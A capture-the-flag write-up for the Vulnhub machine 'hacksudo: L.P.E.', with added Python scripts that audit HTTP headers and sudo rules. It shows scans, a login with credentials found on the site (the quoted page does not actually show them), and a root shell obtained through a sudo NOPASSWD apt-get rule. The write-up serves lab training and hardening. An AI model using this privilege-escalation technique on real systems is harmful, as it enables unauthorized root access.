Hacksudo LPE
Author: Jason_huawen
Target machine basics
Name: hacksudo: L.P.E.
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.126.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.215 08:00:27:b3:96:72 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.215.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.215 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 08:58 EST
Nmap scan report for localhost (192.168.56.215)
Host is up (0.00038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 2a:ad:52:59:dc:7f:b0:e3:5b:47:36:d2:e7:1d:1a:5a (RSA)
| 256 d6:3f:d5:8e:fe:10:f5:bc:2c:a8:53:3b:78:ec:30:4e (ECDSA)
|_ 256 b5:1e:df:2d:3f:3f:c6:f9:ca:37:a7:dc:8c:ba:c2:fa (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
4200/tcp open ssl/http ShellInABox
|_http-title: Shell In A Box
| ssl-cert: Subject: commonName=debian
| Not valid before: 2021-05-01T13:03:08
|_Not valid after: 2041-04-26T13:03:08
|_ssl-date: TLS randomness does not represent time
MAC Address: 08:00:27:B3:96:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.51 seconds
The NMAP scan shows that the target has 3 open ports: 22 (SSH), 80 (HTTP) and 4200 (HTTPS, Shell In A Box).
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ nikto -h http://192.168.56.215
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.215
+ Target Hostname: 192.168.56.215
+ Target Port: 80
+ Start Time: 2022-11-23 09:01:19 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Root page / redirects to: login.php
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-11-23 09:02:11 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo
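The Nikto findings above (missing X-Frame-Options and X-Content-Type-Options, a PHPSESSID cookie without the httponly flag, a version-revealing Server header, and directory indexing on /css/ and /img/) are all things a defender can check for in a raw HTTP response before a scanner does. The following script is an added example, not part of the original writeup or the Hacksudo machine: it parses a response head and body and reports each weakness, with a weak response and a hardened one placed side by side. The three sample responses are constructed for the example and only modelled on the findings above; they are not captures from the target.

```python
import re

# Constructed sample: weak response modelled on the Nikto findings (not a real capture)
SAMPLE_WEAK = """\
HTTP/1.1 302 Found
Server: Apache/2.4.38 (Debian)
Set-Cookie: PHPSESSID=0123456789abcdef; path=/
Location: login.php
Content-Type: text/html; charset=UTF-8

"""

# Constructed sample: an Apache autoindex page, as reported for /css/ and /img/
SAMPLE_INDEX = """\
HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Index of /challenge</title></head>
<body><h1>Index of /challenge</h1></body></html>
"""

# Constructed sample: the same redirect with the headers and cookie flags set
SAMPLE_HARDENED = """\
HTTP/1.1 302 Found
Server: Apache
Set-Cookie: PHPSESSID=0123456789abcdef; path=/; HttpOnly; Secure; SameSite=Lax
Location: login.php
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=UTF-8

"""


def parse_response(raw):
    """Split a raw HTTP response into (status line, [(name, value)], body).

    Header names are lower-cased; duplicates (e.g. several Set-Cookie) are kept.
    """
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    status = lines[0]
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def check_response(raw):
    """Return a list of (location, message) findings for one response."""
    status, headers, body = parse_response(raw)
    names = {n for n, _ in headers}
    findings = []

    # Clickjacking: either X-Frame-Options or a CSP frame-ancestors directive must be present
    csp_values = [v for n, v in headers if n == "content-security-policy"]
    if "x-frame-options" not in names and not any("frame-ancestors" in v.lower() for v in csp_values):
        findings.append(("x-frame-options", "missing; page can be framed (clickjacking)"))

    # MIME sniffing: header must exist and be exactly 'nosniff'
    xcto = [v for n, v in headers if n == "x-content-type-options"]
    if not any(v.lower() == "nosniff" for v in xcto):
        findings.append(("x-content-type-options", "missing or not 'nosniff'"))

    for n, v in headers:
        # Version disclosure in the Server banner (Apache/2.4.38 in the scan above)
        if n == "server" and re.search(r"\d+\.\d+", v):
            findings.append(("server", f"reveals version: {v}"))
        # Session cookies should carry HttpOnly and Secure
        if n == "set-cookie":
            cookie_name = v.split("=", 1)[0].strip()
            attrs = {a.strip().split("=")[0].lower() for a in v.split(";")[1:]}
            for flag in ("httponly", "secure"):
                if flag not in attrs:
                    findings.append(("set-cookie", f"{cookie_name} lacks {flag}"))

    # Apache autoindex pages carry an "Index of /..." title; 'Options -Indexes' disables them
    if re.search(r"<title>\s*Index of /", body, re.IGNORECASE):
        findings.append(("body", "directory listing enabled (Apache autoindex)"))
    return findings


if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("index", SAMPLE_INDEX), ("hardened", SAMPLE_HARDENED)):
        print(f"[{label}]")
        for where, msg in check_response(sample) or [("-", "no findings")]:
            print(f"  {where}: {msg}")
```

Running the script reports five findings for the weak response, three for the autoindex page (no cookie is set there, and the Server banner carries no version) and none for the hardened one; the hardened sample also shows the Apache-side fixes (ServerTokens Prod for the banner, Options -Indexes for the listings, and the HttpOnly/Secure cookie flags that PHP's session.cookie_httponly and session.cookie_secure settings control).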
Nikto did return some results, such as /login.php and a few other directories, but nothing of real use for gaining access.
Next, use Gobuster to scan the target site for other files and directories:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ gobuster dir -u http://192.168.56.215 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.215
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2022/11/23 09:03:15 Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/contact.php (Status: 200) [Size: 82287]
/about.php (Status: 200) [Size: 73082]
/img (Status: 301) [Size: 314] [--> http://192.168.56.215/img/]
/products.html (Status: 200) [Size: 16638]
/login.php (Status: 200) [Size: 2886]
/index.php (Status: 302) [Size: 0] [--> login.php]
/header.php (Status: 302) [Size: 0] [--> /login.php]
/p (Status: 301) [Size: 312] [--> http://192.168.56.215/p/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.215/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.215/js/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.215/javascript/]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/accounts.html (Status: 200) [Size: 9057]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 316] [--> http://192.168.56.215/fonts/]
/challenge (Status: 301) [Size: 320] [--> http://192.168.56.215/challenge/]
/det (Status: 301) [Size: 314] [--> http://192.168.56.215/det/]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 1102060 / 1102805 (99.93%)
===============================================================
2022/11/23 09:05:51 Finished
===============================================================
The Gobuster output shows a /challenge directory; visit it:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /challenge</title>
</head>
<body>
<h1>Index of /challenge</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="apt-get.php">apt-get.php</a></td><td align="right">2021-05-10 03:49 </td><td align="right">2.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge.php">challenge.php</a></td><td align="right">2021-04-26 02:56 </td><td align="right">816 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge1.php">challenge1.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">2.9K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge2.php">challenge2.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">2.1K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge3.php">challenge3.php</a></td><td align="right">2021-05-16 01:43 </td><td align="right">1.7K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge4.php">challenge4.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge5.php">challenge5.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.6K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge6.php">challenge6.php</a></td><td align="right">2021-05-16 01:44 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge8.php">challenge8.php</a></td><td align="right">2021-05-16 01:45 </td><td align="right">1.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge9.php">challenge9.php</a></td><td align="right">2021-05-16 01:45 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge10.php">challenge10.php</a></td><td align="right">2021-05-16 01:46 </td><td align="right">1.4K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="challenge11.php">challenge11.php</a></td><td align="right">2021-05-13 05:28 </td><td align="right">1.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="demo.php">demo.php</a></td><td align="right">2021-05-10 03:55 </td><td align="right">2.5K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="flag.php">flag.php</a></td><td align="right">2021-05-10 05:21 </td><td align="right">917 </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="logo.png">logo.png</a></td><td align="right">2021-04-26 04:31 </td><td align="right"> 29K</td><td> </td></tr>
<tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="page/">page/</a></td><td align="right">2021-05-16 01:26 </td><td align="right"> - </td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.215 Port 80</address>
</body></html>
The first link in the returned listing contains username and password information:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ curl http://192.168.56.215/challenge/apt-get.php
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
<h2 style="padding-bottom: 190px;"></h2>
<form method="post" action="../challenge/challenge1.php">
<button type="submit" class="btn btn-outline-dark" style="margin-bottom: -100px">Back</button>
</form>
<h3><p style="text-align:right;"><a href="https://leetvilu.blogspot.com/">For more information about apt-get</a></p></h3>
</body>
<hr class="hr">
<div class="container">
<footer class="footer">
<center><p style="margin-left:65px; color:#777777" class="text-center" >© HackSudo 2021</p></center>
</footer>
</div>
<script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
</html>
Try whether the username user1 and password hacksudo can log in over SSH:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo_LPE]
└─$ ssh [email protected]
The authenticity of host '192.168.56.215 (192.168.56.215)' can't be established.
ED25519 key fingerprint is SHA256:iSCtzn93Zn0wahmO4fJNBoPyqcsZCVH++PlJTVmt7Xs.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.215' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux hacksudoLPE 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 16 04:16:42 2021 from 192.168.1.4
user1@hacksudoLPE:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@hacksudoLPE:~$
Privilege escalation
user1@hacksudoLPE:~$ sudo -l
Matching Defaults entries for user1 on hacksudoLPE:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user1 may run the following commands on hacksudoLPE:
(root) NOPASSWD: /usr/bin/apt-get
user1@hacksudoLPE:~$
The sudo -l output shows that apt-get can be used for privilege escalation; following the method listed on the GTFOBins site, root is obtained:
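From the defender's side, the rule above ((root) NOPASSWD: /usr/bin/apt-get) is exactly the kind of entry a sudoers audit should flag: apt-get is one of the binaries GTFOBins lists as able to hand a shell to the invoking user when run as root, so granting it under sudo is equivalent to granting root. The script below is an added example, not code from the writeup or from the Hacksudo machine: it parses sudo -l output of the form shown above and rates each rule. The first sample is the output shown in this writeup; the second sample and the SHELL_ESCAPE_BINARIES set are constructed for the example (the set is a short, hand-picked subset of the GTFOBins sudo category, not a complete list).

```python
import re

# Sample 1: the `sudo -l` output shown in this writeup for user1
SUDO_L_PAGE = r"""
Matching Defaults entries for user1 on hacksudoLPE:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User user1 may run the following commands on hacksudoLPE:
    (root) NOPASSWD: /usr/bin/apt-get
"""

# Sample 2: constructed output with several rules, to show the general parsing
SUDO_L_OTHER = r"""
Matching Defaults entries for webadmin on example-host:
    env_reset, secure_path=/usr/sbin\:/usr/bin\:/sbin\:/bin
User webadmin may run the following commands on example-host:
    (root) NOPASSWD: /usr/bin/id, /usr/bin/vim /etc/hosts
    (ALL : ALL) ALL
"""

# Hand-picked subset of binaries that GTFOBins documents as able to spawn a shell
# or write arbitrary files when run under sudo (assumption: short list for the example)
SHELL_ESCAPE_BINARIES = {
    "apt-get", "apt", "vim", "vi", "less", "more", "man", "find", "awk",
    "python3", "perl", "bash", "sh", "env", "git", "tar", "zip",
}

# One rule line: "(runas[:group]) [TAG: ...] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_rules(text):
    """Return the command rules from `sudo -l` output as a list of dicts."""
    rules = []
    in_commands = False
    for line in text.splitlines():
        # Everything after the "User X may run ..." line is a rule
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas_user = m.group("runas").split(":")[0].strip()
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({"runas": runas_user, "nopasswd": "NOPASSWD" in tags, "command": cmd})
    return rules


def audit_rules(rules):
    """Return (command, severity, reason) for each rule that effectively grants root."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        if r["command"] == "ALL":
            findings.append((r["command"], "HIGH", "unrestricted root command access"))
            continue
        binary = r["command"].split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            severity = "HIGH" if r["nopasswd"] else "MEDIUM"
            findings.append((r["command"], severity, f"{binary} can drop to a root shell (see GTFOBins)"))
    return findings


def audit_sudo_output(text):
    return audit_rules(parse_sudo_rules(text))


if __name__ == "__main__":
    for label, sample in (("page", SUDO_L_PAGE), ("other", SUDO_L_OTHER)):
        print(f"[{label}]")
        for cmd, sev, why in audit_sudo_output(sample):
            print(f"  {sev:6} {cmd}: {why}")
```

For the writeup's rule the audit reports a single HIGH finding; for the constructed sample it flags the vim entry and the ALL rule and leaves /usr/bin/id alone. Restricting the rule to specific apt-get arguments does not remove the risk, because the pager and hook mechanisms the GTFOBins entry relies on are reachable from ordinary subcommands, so the fix is to drop the rule or to run package updates through a dedicated, non-interactive wrapper.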
user1@hacksudoLPE:~$ sudo /usr/bin/apt-get changelog apt
Get:1 store: apt 1.8.2.2 Changelog
Fetched 458 kB in 0s (44.3 MB/s)
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 68K
drwx------ 5 root root 4.0K May 16 2021 .
drwxr-xr-x 21 root root 4.0K May 7 2021 ..
-rw------- 1 root root 1.8K May 16 2021 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K May 6 2021 .gnupg
-rw------- 1 root root 36 May 1 2021 .lesshst
drwxr-xr-x 3 root root 4.0K May 1 2021 .local
-rw------- 1 root root 0 May 6 2021 .node_repl_history
-rw-r--r-- 1 root root 176 May 1 2021 .profile
-rw-r--r-- 1 root root 11 May 16 2021 root.txt
-rw-r--r-- 1 root root 75 May 8 2021 .selected_editor
drwx------ 2 root root 4.0K May 16 2021 .ssh
-rw------- 1 root root 24K May 16 2021 .viminfo
# cat root.txt
viluhacker
Privilege escalation succeeded and the root flag was obtained.
From: https://www.cnblogs.com/jason-huawen/p/16920384.html